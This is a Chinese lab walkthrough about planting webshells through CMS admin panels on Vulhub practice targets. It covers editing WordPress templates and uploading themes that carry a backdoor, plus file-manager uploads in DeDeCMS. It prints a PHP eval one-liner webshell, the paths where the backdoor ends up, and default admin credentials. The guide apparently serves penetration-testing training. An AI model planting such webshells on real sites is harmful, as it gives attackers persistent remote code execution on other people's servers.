目录
步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...
步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php
步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
步骤一:与WPCMS类似,直接修改模板拿WebShel.点击【模板】-》【默认模板管理】--》【index.htm】-->【修改】在文件修改中添加一句话代码…如下
步骤二:点击 【生成】--》点击【更新主页HTML】--》将主页位置修改为【../index.php 】--》【生成静态】--》点击【更新主页】 再次访问站点首页可发现变化...
步骤一:点击 【模块】--》【广告管理】--》【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】
步骤二:点击【代码】--》在图中显示的路径与站点进行拼接..访问测试!
步骤一:访问以下地址为ASPCMS.并登陆到后台(这里注意在搭建站点的时候注意权限问题)
步骤二:点击【扩展功能】--》【幻灯片设置】--》点击 【保存】--》开启代理进行抓包
步骤三:在抓取的数据包中修改 slideTextstatus 字段的值为以下代码并进行发包查看被修改的asp文件内容...
步骤一:准备一个一句话木马的asp文件,然后压缩成zip格式。
步骤二:点击【⼯具】--》 【⽂件管理】--》 【功能菜单】 --》【上传⽂件】
一:WordPress
步骤一:进入Vulhub靶场并执行以下命令开启靶场;在浏览器中访问并安装好子...
#执行命令
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d
#靶场地址
http://192.168.4.176:8080/wp-admin/
步骤二:思路是修改其WP的模板写入一句话木马后门并访问其文件即可GetShel;登陆WP后点击【外观】--》【编辑】 --》 404.php
在其404模板中插入一句话木马代码.点击【更新文件】按钮
<?php eval($ POST['cmd']);?>
步骤三:访问以下连接即可获取WebShel...
#拼接路径
/wp-content/themes/twentyfifteen/404.php
#访问连接
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
http://192.168.4.176:8080//wp-content/themes/twentyfifteen/404.php
菜刀连接:
姿势二:上传主题拿WebShell
步骤一:接着上一个环境使用...将带有后门的文件加入到主题中并将主题压缩为ZIP文件...点击【外观】 --》【主题】 --》【添加】--》【上传主题】--》【浏览】--》【现在安装】
主题文件
步骤二:安装成功后访问主题下的网站后门文件..
#拼接路径
/wp-content/themes/ Farallon-develop-v0.3.8/shell.php
#访问地址
http://192.168.4.176:8080/wp-content/themes/ Farallon-develop-v0.3.8/shell.php
#蚁剑连接
二:DeDeCMS
漏洞复现
姿势一:通过文件管理器上传WebShell
步骤一:访问目标靶场其思路为 dedecms 后台可以直接上传任意文件,可以通过文件管理器上传php文件获取webshell...
#前台
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1
http://192.168.4.139/dedecms/index.php?upcache=1
#后台
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/
http://192.168.4.139/dedecms/dede/
#信息
username:admin
password:admin
步骤二:登陆到后台点击【核心】--》【文件式管理器】【文件上传】将准备好的一句话代
码上传...OK
步骤三:访问上传成功后的文件并使用蚁剑连接测试...
#文件地址